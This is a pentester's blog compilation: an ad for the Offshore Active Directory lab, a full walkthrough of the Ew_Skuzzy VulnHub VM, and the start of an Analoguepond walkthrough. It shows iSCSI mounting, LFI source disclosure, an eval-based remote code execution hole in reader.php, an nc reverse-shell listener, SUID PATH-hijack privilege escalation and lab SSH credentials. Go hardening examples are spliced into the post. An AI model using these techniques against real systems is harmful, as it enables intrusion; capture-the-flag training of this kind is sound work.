Offshore – A Windows Active Directory Pentesting Lab

Intro

In August ch4p from Hack the Box approached me with an offer to build a CTF for the annual Greek capture the flag event called Panoptis. The idea was to build a unique Active Directory lab environment to challenge CTF competitors by exposing them to a simulated real-world penetration test (pretty rare for a CTF). I spent a bit over a month building the first iteration of the lab and thus Offshore was born.

I flew to Athens, Greece for a week to provide on-site support during the lab. Overall the CTF lab was a hit and very well received by the competitors and others involved with the event.

Afterwards, ch4p offered for me to further build out the lab and eventually offer it as a Pro Lab on the main Hack the Box website. I spent another 3 or so months refining elements within the lab, increasing the overall size and difficulty and causing ch4p a lot of stress by asking for more and more storage, ram and virtual networks.

I spent countless hours with the goal of building a realistic Active Directory based lab that had the feel of a real-world corporate environment made up of many things I have seen during internal/external penetration testing engagements over the years. My goal was to produce a lab that would be accessible and achievable by junior penetration testers, help mid-level folks improve their skills and even provide a bit of a challenge to seasoned veterans. The lab also serves as a test bed to try out many common and obscure AD attacks that you may read about but either never encounter during a real-world engagement or do not have the proper testing environment to practice and refine the techniques.

The lab went live on September 1, 2018 and has been a hit so far. Of course there were a few issues I had to hammer out after go-live and some lessons learned, but overall it has been a success. This project has been an exciting and humbling experience. I learned a ton while building this and configuring many of the attacks. So far feedback has been positive.

Anyway, let's get into a description of the lab.

Description

You are an agent tasked with exposing money laundering operations in an offshore international bank. Breach the DMZ and pivot through the internal network to locate the bank’s protected databases and a shocking list of international clients. OFFSHORE is designed to simulate a real-world penetration test, starting from an external position on the internet and gaining a foothold inside a simulated corporate Windows Active Directory network. Users will have to pivot and jump across trust boundaries to complete the lab. This lab is intended to expose participants to:

  • Web application attacks
  • Enumeration
  • Exploitation of common and obscure real-world Active Directory flaws
  • Local privilege escalation
  • Lateral movement and crossing trust boundaries
  • Evading endpoint protections
  • Reverse engineering
  • Out-of-the-box thinking

Players will have the opportunity to attack 16 hosts of various operating system types and versions to obtain 29 flags across a realistic Active Directory lab environment with various standalone challenges hidden throughout. The Active Directory lab simulates the look and feel of a real-world corporate network complete with very active simulated users and other elements of a busy enterprise. The lab is designed to start out relatively easy and progress in difficulty throughout.

Users will start from an external perspective and have to penetrate the “DMZ” and then move laterally through the CORP.LOCAL, DEV, ADMIN and CLIENT forests to complete the lab.

Target Audience

I designed Offshore to appeal to a wide variety of users, everyone from junior-level penetration testers to seasoned testers, as well as infosec hobbyists and even blue teamers; there is something for everyone. I can pretty much guarantee you will pick up at least a few new tricks which can be immediately applied to your real-world engagements or taken back to your organization to help improve its overall security posture.

Pricing

Please reach out for pricing. Tickets are available for 30, 60, or 90 days of access for individuals. Corporate pricing is also available for larger groups.

Additional Information

Offshore is hosted in conjunction with Hack the Box (https://www.hackthebox.eu). Participants will receive a VPN key to connect directly to the lab.

Once connected to VPN, the entry point for the lab is 10.10.110.0/24.  *Note* The firewall at 10.10.110.3 is out of scope.

If you have questions or would like to learn more about the lab, feel free to contact me on Twitter or on Mattermost. Participants in the lab will have access to a private Offshore channel on the Netsecfocus Mattermost (https://chat.netsecfocus.com/join).

Ew_Skuzzy:1 vulnhub walkthrough

It’s been a while since I’ve had the time to take on a VM over at vulnhub or put together a walkthrough. Building my own challenges, studying for the OSCE, work, and family took all of my time.

I finally had some free time so I checked out the latest slew of releases. Ew_Skuzzy had been up for a few days without any walkthroughs so it looked like a good challenge.

You can grab the VM here: https://www.vulnhub.com/entry/ew_skuzzy-1,184/

The readme has a note that VMware users may have issues. If you use VMware workstation like I do (or player) these steps will get you up and running.

I first attached a CD-rom to the VM and added a Gparted ISO, selected boot to firmware and changed the boot order in BIOS to boot from the ISO. Once Gparted loaded I was able to mount the file system and make a few changes with the following steps within a terminal window:

  1) sudo su
  2) mount /dev/sda1 /mnt
  3) vim /mnt/etc/network/interfaces and change the interface to 'eth0'
  4) vim /mnt/etc/default/grub and edit the line
     GRUB_CMDLINE_LINUX="" to read:
     GRUB_CMDLINE_LINUX="net.ifnames=0 biosdevname=0"
  5) poweroff
  6) Swap the Gparted ISO for an Ubuntu server ISO, follow the same steps to boot from the CD and once the installer menu loads choose "rescue a broken system" to boot into rescue mode.
  7) Follow all the prompts until arriving at the screen that allows you to execute a shell on /dev/sda1.
  8) In this shell type "update-grub" then type "exit"
  9) Select "execute a shell in the installer environment", then "poweroff"
  10) Remove the CD from the VM, boot to firmware and change the boot order back to the HDD. Once the VM boots up it should grab a lease from DHCP and be fully discoverable from your attacking machine.

Once that was done I fired up the VM and got to work. The creator was nice enough to post the IP for us:

I started off with an nmap scan of all ports which showed SSH, nginx on port 80 and an iSCSI service listening on port 3260.

root@kali:~# nmap -sV -p- -T4 192.168.85.146 

Starting Nmap 6.46 ( http://nmap.org ) at 2017-03-21 13:09 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 1 undergoing ARP Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Nmap scan report for 192.168.85.146
Host is up (0.00023s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     (protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.46%I=7%D=3/21%Time=58D15E6E%P=i686-pc-linux-gnu%r(NULL,2
SF:9,"SSH-2\.0-OpenSSH_7\.2p2\x20Ubuntu-4ubuntu2\.1\r\n");
MAC Address: 00:0C:29:C8:3D:31 (VMware)

I ran dirb for a bit and came up with several trolls:

The page source of the above page had a base64 encoded comment in the HTML:

Sadly not our first flag:

root@kali:~# echo SGVsbG8sIGlzIGl0IGZsYWdzIHlvdSdyZSBsb29raW5nIGZvcj8KSSBjYW4gc2VlIGl0IGluIHlvdXIgZXllcwpJIGNhbiBzZWUgaXQgaW4geW91ciBzbWlsZQpGbGFncyBhcmUgYWxsIEkndmUgZXZlciB3YW50ZWQgYW5kIG15IHBvcnRzIGFyZSBvcGVuIHdpZGUgCkNhdXNlIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBzYXkgYW5kIHlvdSBrbm93IGp1c3Qgd2hhdCB0byBkbwpBbmQgSSB3YW50IHRvIHRlbGwgeW91IHNvIG11Y2gsIG5vIGZsYWdzIGZvciB5b3UuLi4K | base64 -d
Hello, is it flags you're looking for?
I can see it in your eyes
I can see it in your smile
Flags are all I've ever wanted and my ports are open wide 
Cause you know just what to say and you know just what to do

And I want to tell you so much, no flags for you...

This was my first time dealing with an iSCSI service so I found this link very helpful: https://www.pentestpartners.com/blog/an-interesting-route-to-domain-admin-iscsi/

My first step was to download and install open-iscsi. I was using an older Kali1 VM for this so it was easier to just manually grab and install the .deb from here: https://packages.debian.org/jessie/i386/open-iscsi/download

root@kali:~# dpkg -i open-iscsi_2.0.873+git0.3b4b4500-8+deb8u2_i386.deb

I next ran some discovery with iscsiadm:

root@kali:~# iscsiadm -m discovery -t st -p 192.168.85.146:3260
192.168.85.146:3260,1 iqn.2017-02.local.skuzzy:storage.sys0

Next I used iscsiadm to connect to the target:

root@kali:~# iscsiadm -m node -p 192.168.85.146 --login --target iqn.2017-02.local.skuzzy:storage.sys0
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.85.146,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.85.146,3260] successful.

fdisk showed me that I now had an additional drive (/dev/sdb):

root@kali:~# fdisk -l

Disk /dev/sda: 21.5 GB, 21474836480 bytes
255 heads, 63 sectors/track, 2610 cylinders, total 41943040 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x000d28c9

   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *        2048    40136703    20067328   83  Linux
/dev/sda2        40138750    41940991      901121    5  Extended
/dev/sda5        40138752    41940991      901120   82  Linux swap / Solaris

Disk /dev/sdb: 1073 MB, 1073741824 bytes
34 heads, 61 sectors/track, 1011 cylinders, total 2097152 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000000

Disk /dev/sdb doesn't contain a valid partition table

I next mounted the file system and found the first flag along with a floppy disk image:

root@kali:~# mount /dev/sdb /mnt/skuzzy/
root@kali:~# cd /mnt/skuzzy/
root@kali:/mnt/skuzzy# ls
bobsdisk.dsk  flag1.txt  lost+found
root@kali:/mnt/skuzzy# cat flag1.txt 
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

The floppy can be mounted with the following commands:

root@kali:/mnt/skuzzy# losetup /dev/loop0 /mnt/skuzzy/bobsdisk.dsk 

root@kali:/mnt# mkdir /mnt/floppy
root@kali:/mnt# mount /dev/loop0 -o loop /mnt/floppy
root@kali:/mnt# ls
floppy  hgfs  skuzzy
root@kali:/mnt# cd floppy/
root@kali:/mnt/floppy# ls
lost+found  ToAlice.csv.enc  ToAlice.eml

An email to Alice gave me flag #2 as well as several clues for how to decrypt the encrypted .csv file:

root@kali:/mnt/floppy# cat ToAlice.eml 
G'day Alice,

You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!

Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!

Anyway this algorithm sounded good to me. I used the updated version that won the competition.

You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly. My favourite new Spanish swear came in handy when this happened... supercalifragilisticoespialidoso !

Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. The key is, well, one awesome word I learnt in my recent Spanish classes!

Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) 🙂

Cheers,

Bob.

PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

What stuck out was the following:

  • Competition in October 2000 (AES);
  • 256 bit;
  • “those blocks chain together”  (cipher block chaining);
  • The Spanish swear word was likely a key “supercalifragilisticoespialidoso”;
  • An allusion to rockyou (possibly rockyou.txt for brute forcing the passphrase); and
  • Command option -md sha256 (these are openssl command line options).

The intent may have been to brute force the passphrase but it seemed like it had already been given to us, so after a bit of trial and error I was able to decrypt the .csv with the following command, feeding it the passphrase above:

root@kali:/mnt/floppy# openssl enc -d -aes-256-cbc -in ToAlice.csv.enc -out ToAlice.csv -md SHA256
enter aes-256-cbc decryption password:
root@kali:/mnt/floppy# ls
lost+found  ToAlice.csv  ToAlice.csv.enc  ToAlice.eml
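The -md sha256 hint matters because `openssl enc` turns a passphrase into the key and IV with EVP_BytesToKey, and the digest that derivation uses changed from md5 to sha256 in OpenSSL 1.1.0: the same passphrase derives a different key under each digest, and the wrong one ends in "bad decrypt". The Go program below is an added example, not code from the post or the VM; it implements that derivation and the Salted__ file layout so the effect can be seen directly. The passphrase is the one from Bob's email; the salt and the plaintext are constructed.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	"crypto/sha256"
	"errors"
	"fmt"
	"hash"
)

// evpBytesToKey is OpenSSL's EVP_BytesToKey with count=1, the derivation
// `openssl enc` applies to a passphrase: D_i = H(D_{i-1} || pass || salt),
// concatenated until keyLen+ivLen bytes exist. H is whatever -md selects
// (md5 before OpenSSL 1.1.0, sha256 from 1.1.0 on).
func evpBytesToKey(newHash func() hash.Hash, pass, salt []byte, keyLen, ivLen int) (key, iv []byte) {
	var out, prev []byte
	for len(out) < keyLen+ivLen {
		h := newHash()
		h.Write(prev)
		h.Write(pass)
		h.Write(salt)
		prev = h.Sum(nil)
		out = append(out, prev...)
	}
	return out[:keyLen], out[keyLen : keyLen+ivLen]
}

// opensslEncryptWithSalt writes the `openssl enc -aes-256-cbc` layout: the
// "Salted__" magic, the 8-byte salt, then PKCS#7-padded CBC ciphertext.
func opensslEncryptWithSalt(newHash func() hash.Hash, pass, salt, plaintext []byte) ([]byte, error) {
	if len(salt) != 8 {
		return nil, errors.New("salt must be 8 bytes")
	}
	key, iv := evpBytesToKey(newHash, pass, salt, 32, aes.BlockSize)
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append(append([]byte{}, plaintext...), bytes.Repeat([]byte{byte(pad)}, pad)...)
	ct := make([]byte, len(padded))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, padded)
	return append(append([]byte("Salted__"), salt...), ct...), nil
}

// opensslDecrypt reverses the layout. A wrong digest (or passphrase) derives
// the wrong key, the last block decrypts to garbage and the padding check
// fails: that is the "bad decrypt" the openssl tool reports.
func opensslDecrypt(newHash func() hash.Hash, pass, blob []byte) ([]byte, error) {
	if len(blob) < 16 || !bytes.HasPrefix(blob, []byte("Salted__")) {
		return nil, errors.New("not an OpenSSL Salted__ blob")
	}
	salt, ct := blob[8:16], blob[16:]
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext length is not a multiple of the block size")
	}
	key, iv := evpBytesToKey(newHash, pass, salt, 32, aes.BlockSize)
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	cipher.NewCBCDecrypter(block, iv).CryptBlocks(pt, ct)
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize || pad > len(pt) {
		return nil, errors.New("bad decrypt: invalid padding (wrong passphrase or -md digest?)")
	}
	for _, b := range pt[len(pt)-pad:] {
		if int(b) != pad {
			return nil, errors.New("bad decrypt: invalid padding (wrong passphrase or -md digest?)")
		}
	}
	return pt[:len(pt)-pad], nil
}

func main() {
	pass := []byte("supercalifragilisticoespialidoso")
	salt := []byte("saltsalt") // constructed; openssl picks a random salt
	note := []byte("constructed sample, not the real ToAlice.csv\n")
	blob, err := opensslEncryptWithSalt(sha256.New, pass, salt, note)
	if err != nil {
		panic(err)
	}
	if pt, err := opensslDecrypt(sha256.New, pass, blob); err == nil {
		fmt.Printf("-md sha256: %q\n", pt)
	}
	if _, err := opensslDecrypt(md5.New, pass, blob); err != nil {
		fmt.Println("-md md5:", err)
	}
}
```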

The .csv gave me flag #3 as well as some new web directories to target:

The first was a troll with some retro Geocities scrolling marquee, nice touch:

The page source again contained a base64 encoded comment which was another troll:

root@kali:~# cat base64.txt | base64 -d
George Costanza: [Soup Nazi gives him a look] Medium turkey chili. 
[instantly moves to the cashier] 
Jerry Seinfeld: Medium crab bisque. 
George Costanza: [looks in his bag and notices no bread in it] I didn't get any bread. 
Jerry Seinfeld: Just forget it. Let it go. 
George Costanza: Um, excuse me, I - I think you forgot my bread. 
Soup Nazi: Bread, $2 extra. 
George Costanza: $2? But everyone in front of me got free bread. 
Soup Nazi: You want bread? 
George Costanza: Yes, please. 
Soup Nazi: $3! 
George Costanza: What? 

Soup Nazi: NO FLAG FOR YOU

The second URL was a sweet custom web app:

The ‘Feed Reader’ page was of particular interest and at first glance looked as though it could be leveraged for either an LFI or RFI, or both!

Browsing to http://192.168.85.146/c2444910794e037ebd8aaf257178c90b/?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt gave me the following:

Browsing directly to the data.txt file gave me the full contents which would be useful later:

I checked the troll image exif data for any clues but there was nothing to be had.

I next turned my attention to the ‘p’ parameter to see if I could get something going. Using the technique discussed in this post https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/ I was able to leverage an LFI to pull out the base64 encoded source of each of the PHP pages. I also ran this to try to read files such as /etc/passwd but there were some blocks in place.

Index.php

Flag.php gave me the 4th flag as well as a clue that this flag would come in handy at some point:

The contents of reader.php was particularly interesting:

<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Feed Reader</h1>
<?php
if(isset($_GET['url'])) {
    $url = $_GET['url'];
} else {
    print("<a href=\"?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\">Load Feed</a>");
}

if(isset($url) && strlen($url) != '') {

    // Setup some variables.
    $secretok = false;
    $keyneeded = true;

    // Localhost as a source doesn't need to use the key.
    if(preg_match("#^http://127.0.0.1#", $url)) {
        $keyneeded = false;
        $secretok = true;
    }

    // Handle the key validation when it's needed.
    if($keyneeded) {
        $key = $_GET['key'];
        if(is_array($key)) {
            die("Array trick is mitigated ;)");
        }
        if(isset($key) && strlen($key) == '47') {
            $hashedkey = hash('sha256', $key);
            $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

            // If you can use the following code for a timing attack
            // then good luck 🙂 But.. You have the source anyway, right? 🙂
            if(strcmp($hashedkey, $secret) == 0) {
                $secretok = true;
            } else {
                die("Sorry... Authentication failed. Key was invalid.");
            }

        } else {
            die("Authentication invalid. You might need a key.");
        }
    }

    // Just to make sure the above key check was passed.
    if(!$secretok) {
        die("Something went wrong with the authentication process");
    }

    // Now load the contents of the file we are reading, and parse
    // the super awesomeness of its contents!
    $f = file_get_contents($url);

    $text = preg_split("/##text##/s", $f);

    if(isset($text['1']) && strlen($text['1']) > 0) {
        print($text['1']);
    }

    print "<br /><br />";

    $php = preg_split("/##php##/s", $f);

    if(isset($php['1']) && strlen($php['1']) > 0) {
        eval($php['1']);
        // "If Eval is the answer, you're asking the wrong question!" - SG
        // It hurts me to write insecure code like this, but it is in the
        // name of education, and FUN, so I'll let it slide this time.
    }
}

A check was being made to make sure that the file being served was from the localhost; otherwise a key value was needed. The key value had to be a 47-character string whose sha256 matched the stored digest, passed as a parameter with the GET request. Hm, flag 4 is exactly 47 characters. The sha256 of flag 4 checked out perfectly against the $secret variable in the source:

root@kali:/var/www# echo -n flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b} | sha256sum
5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656 

The PHP would next check the data.txt ##text## section and print it to the screen and evaluate whatever PHP code was in the ##php## section. A quick check showed me that I had command execution.
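As an added illustration in Go (not the VM's code), here is the hardened form of the reader's two decisions: the source check compares the URL's parsed host against an allowlist instead of matching a string prefix, the key check compares digests in constant time, and a ##php## section is refused rather than handed to eval(). The digest and the 47-character length are those from reader.php; the allowlist, host names and sample feed are assumptions.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"encoding/hex"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// Hosts the reader may fetch from (assumed allowlist). reader.php instead
// trusts any URL whose text starts with "http://127.0.0.1".
var allowedHosts = map[string]bool{"127.0.0.1": true, "localhost": true}

// keyDigest is $secret from reader.php: sha256 of the 47-character key.
const keyDigest = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656"

// authorize mirrors the decision in reader.php (a local source needs no key;
// any other source needs a 47-character key whose sha256 matches $secret)
// but works on the parsed host and compares digests in constant time.
func authorize(rawURL, key string) error {
	u, err := url.Parse(rawURL)
	if err != nil || (u.Scheme != "http" && u.Scheme != "https") {
		return errors.New("unsupported or malformed URL")
	}
	if allowedHosts[u.Hostname()] {
		return nil
	}
	if len(key) != 47 {
		return errors.New("authentication invalid: a 47-character key is required")
	}
	want, err := hex.DecodeString(keyDigest)
	if err != nil {
		return err
	}
	got := sha256.Sum256([]byte(key))
	if subtle.ConstantTimeCompare(got[:], want) != 1 {
		return errors.New("authentication failed: key was invalid")
	}
	return nil
}

// Feed is the ##text## / ##php## layout reader.php splits data.txt into.
type Feed struct {
	Text    string
	HasCode bool // a non-empty ##php## section is present
}

// parseFeed reproduces the preg_split indexing: element 1 is whatever sits
// between the first marker and the next one (or the end of the body).
func parseFeed(body string) Feed {
	var f Feed
	if parts := strings.SplitN(body, "##text##", 3); len(parts) > 1 {
		f.Text = parts[1]
	}
	if parts := strings.SplitN(body, "##php##", 3); len(parts) > 1 && len(parts[1]) > 0 {
		f.HasCode = true
	}
	return f
}

// render is the hardened handler: authorize the source, parse the feed and
// never evaluate anything that came from it.
func render(rawURL, key, body string) (string, error) {
	if err := authorize(rawURL, key); err != nil {
		return "", err
	}
	f := parseFeed(body)
	if f.HasCode {
		return "", errors.New("feed contains a ##php## section; refusing to render it")
	}
	return f.Text, nil
}

func main() {
	// Constructed sample feed, not the lab's actual data.txt.
	body := "##text##Hello from the feed##text##"
	out, err := render("http://127.0.0.1/data.txt", "", body)
	fmt.Println(out, err)
}
```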

 

There are several ways to get a shell; this is what I tried after attempts to obtain a reverse shell with mknod, netcat and other methods did not work. The two commands could also have been combined into a single command.

I created a tiny shell script with the following PHP command and hosted it on my local Apache server:

I then executed the following two commands to upload the shell script to /tmp and execute it:

Wonderful, a shell!

root@kali:/var/www# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.85.131] from (UNKNOWN) [192.168.85.146] 51562
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@skuzzy:~/html/c2444910794e037ebd8aaf257178c90b$ ls
ls
data.txt  index.php   party.php   trollface.png
flag.php  parrot.gif  reader.php  welcome.php

The usual enumeration turned up an interesting SUID binary in /opt.

www-data@skuzzy:/$ find / -uid 0 -perm -4000 -type f 2>/dev/null
find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/sudo
/bin/fusermount
/bin/mount
/bin/su
/bin/ntfs-3g
/bin/ping
/bin/ping6
/bin/umount
/opt/alicebackup

Just running the binary, it appeared to execute the id command before attempting to make an SSH connection:

On a hunch that id was not being called with an absolute path, I created a dummy file /tmp/id containing “/bin/sh” and modified my PATH variable. If the hunch was right, running the alicebackup binary from the /opt directory while in the /tmp directory should make the program call my malicious id shell script through the PATH abuse.

I ran the command, fixed up my PATH variable and it worked. I now had root access and the 5th and final flag:
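The alicebackup finding comes down to a privileged program resolving a helper by bare name through the caller's PATH. The Go program below is an added example, not the lab's binary: it shows that lookup next to the pattern a privileged program should use instead, a fixed absolute path from an allowlist and a fixed environment that ignores whatever the caller set. The helper allowlist, the paths and the temporary directory are constructed for the demonstration.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"os/exec"
	"path/filepath"
	"strings"
)

// resolveOnPath does what system("id") or execvp("id") does: walk the
// caller-supplied PATH in order and take the first executable named cmd.
// Whoever controls PATH therefore controls which "id" a privileged program runs.
func resolveOnPath(cmd, pathEnv string) (string, bool) {
	for _, dir := range strings.Split(pathEnv, string(os.PathListSeparator)) {
		if dir == "" {
			dir = "." // an empty PATH element means the current directory
		}
		candidate := filepath.Join(dir, cmd)
		if fi, err := os.Stat(candidate); err == nil && !fi.IsDir() && fi.Mode()&0o111 != 0 {
			return candidate, true
		}
	}
	return "", false
}

// helperPaths is the fixed mapping a privileged program should use instead
// of a bare name (assumed locations): only these absolute paths are run.
var helperPaths = map[string]string{
	"id":  "/usr/bin/id",
	"ssh": "/usr/bin/ssh",
}

// safeEnv is the environment handed to the helper; the caller's PATH,
// LD_PRELOAD and everything else are dropped rather than inherited.
var safeEnv = []string{"PATH=/usr/bin:/bin", "LANG=C"}

// privilegedHelper builds the command a hardened alicebackup would run:
// absolute path from the allowlist, fixed environment, no PATH search.
func privilegedHelper(name string, args ...string) (*exec.Cmd, error) {
	path, ok := helperPaths[name]
	if !ok {
		return nil, errors.New("helper not in allowlist: " + name)
	}
	cmd := exec.Command(path, args...) // absolute path: exec does no lookup
	cmd.Env = append([]string(nil), safeEnv...)
	return cmd, nil
}

func main() {
	// Constructed demonstration: a directory we own placed first on PATH.
	dir, err := os.MkdirTemp("", "pathdemo")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	fake := filepath.Join(dir, "id")
	if err := os.WriteFile(fake, []byte("#!/bin/sh\necho shadowed\n"), 0o755); err != nil {
		panic(err)
	}
	resolved, _ := resolveOnPath("id", dir+":/usr/bin:/bin")
	fmt.Println("bare-name lookup resolves to:", resolved)
	if cmd, err := privilegedHelper("id"); err == nil {
		fmt.Println("hardened helper runs:", cmd.Path, "with env", cmd.Env)
	}
}
```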

This was a great VM with an interesting twist in the iSCSI angle as well as the combined LFI/RFI. Unique and kept me on my toes. Setting up open-iscsi to interact with the service was not difficult and worth the learning opportunity.

Thanks to @vortexau for putting together the challenge, can’t wait to see the next one!

As always thank you to @g0tmi1k for hosting these challenges and maintaining Vulnhub.

 

Analoguepond Vulnhub Walkthrough

Just around the time I was learning/experimenting with Puppet in my home lab, knightmare asked me to preview a new VM based around some real-world tactics. This was a truly unique and interesting challenge and shows the dangers of leaving a Puppet, Ansible or any other configuration management or package management tool unsecured. As always the VM was ripe with cultural references which kept me on my toes researching both the nuances and the technical pieces. I highly recommend taking it for a spin, you can grab it here: https://www.vulnhub.com/entry/analougepond-1,185/

The README provides some hints for getting going:

Since you're not a Teuchter, I'll offer some hints to you:

Remember TCP is not the only protocol on the Internet
My challenges are never finished with root. I make you work for the flags.
The intended route is NOT to use forensics or 0-days, I will not complain either way.

To consider this VM complete, you need to have obtained:

    Troll Flag: where you normally look for them
    Flag 1: You have it when you book Jennifer tickets to Paris on Pan Am.
    Flag 2: It will include a final challenge to confirm you hit the jackpot.
    Have root everywhere (this will make sense once you're in the VM)
    User passwords
    2 VNC passwords

Best of luck! If you get stuck, eat some EXTRABACON

NB: Please allow 5-10 minutes or so from powering on the VM for background tasks to run before proceeding to attack.

After loading it up and waiting a few minutes I had an IP and was ready to go:

I added an entry to my hosts file to simplify things and started out with an nmap scan of all TCP ports and also a UDP scan of the top 1000 ports due to the readme alluding to other protocols in use.

The TCP scan just gave me an SSH port, I didn’t even attempt bruteforcing because I knew knightmare wouldn’t make it that easy.

root@mrb3n:~# nmap -sV -Pn -T4 -p- --open analoguepond

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-14 09:39 EST
Stats: 0:10:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 39.70% done; ETC: 10:05 (0:15:34 remaining)
Nmap scan report for 192.168.85.128
Host is up (0.0010s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
MAC Address: 00:0C:29:C9:A7:A4 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

The UDP scan turned up SNMP, and given the readme's nod towards EXTRABACON (which requires SSH, SNMP and a public SNMP community string) I directed my attention there with snmpwalk.

root@mrb3n:~# nmap -sU --open analoguepond

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-12-14 06:07 EST
Nmap scan report for 192.168.85.128
Host is up (0.00094s latency).
Not shown: 998 closed ports
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
161/udp open          snmp
MAC Address: 00:0C:29:C9:A7:A4 (VMware)

I’ve truncated the output and just left in the key items.

root@mrb3n:~# snmpwalk analoguepond -c public -v1
iso.3.6.1.2.1.1.1.0 = STRING: "Linux analougepond 3.19.0-77-generic #85~14.04.1-Ubuntu SMP Mon Dec 5 11:19:02 UTC 2016 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (103731) 0:17:17.31
iso.3.6.1.2.1.1.4.0 = STRING: "Eric Burdon <eric@example.com>"
iso.3.6.1.2.1.1.5.0 = STRING: "analougepond"
iso.3.6.1.2.1.1.6.0 = STRING: "There is a house in New Orleans they call it..."
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (16) 0:00:00.16

So based on this it seems pretty certain that ‘eric’ is our username. I would have tried combos such as eric.burdon, eburdon etc., but ‘eric@example.com’ seemed to be nudging me in the right direction. Our hint “There is a house in New Orleans…” could only be “The Rising Sun”, which makes sense because Eric Burdon was the lead vocalist for the band: https://en.wikipedia.org/wiki/The_Animals.

Cranking this up in my headphones as the wife and kid slept I was able to SSH in with the creds eric:therisingsun.

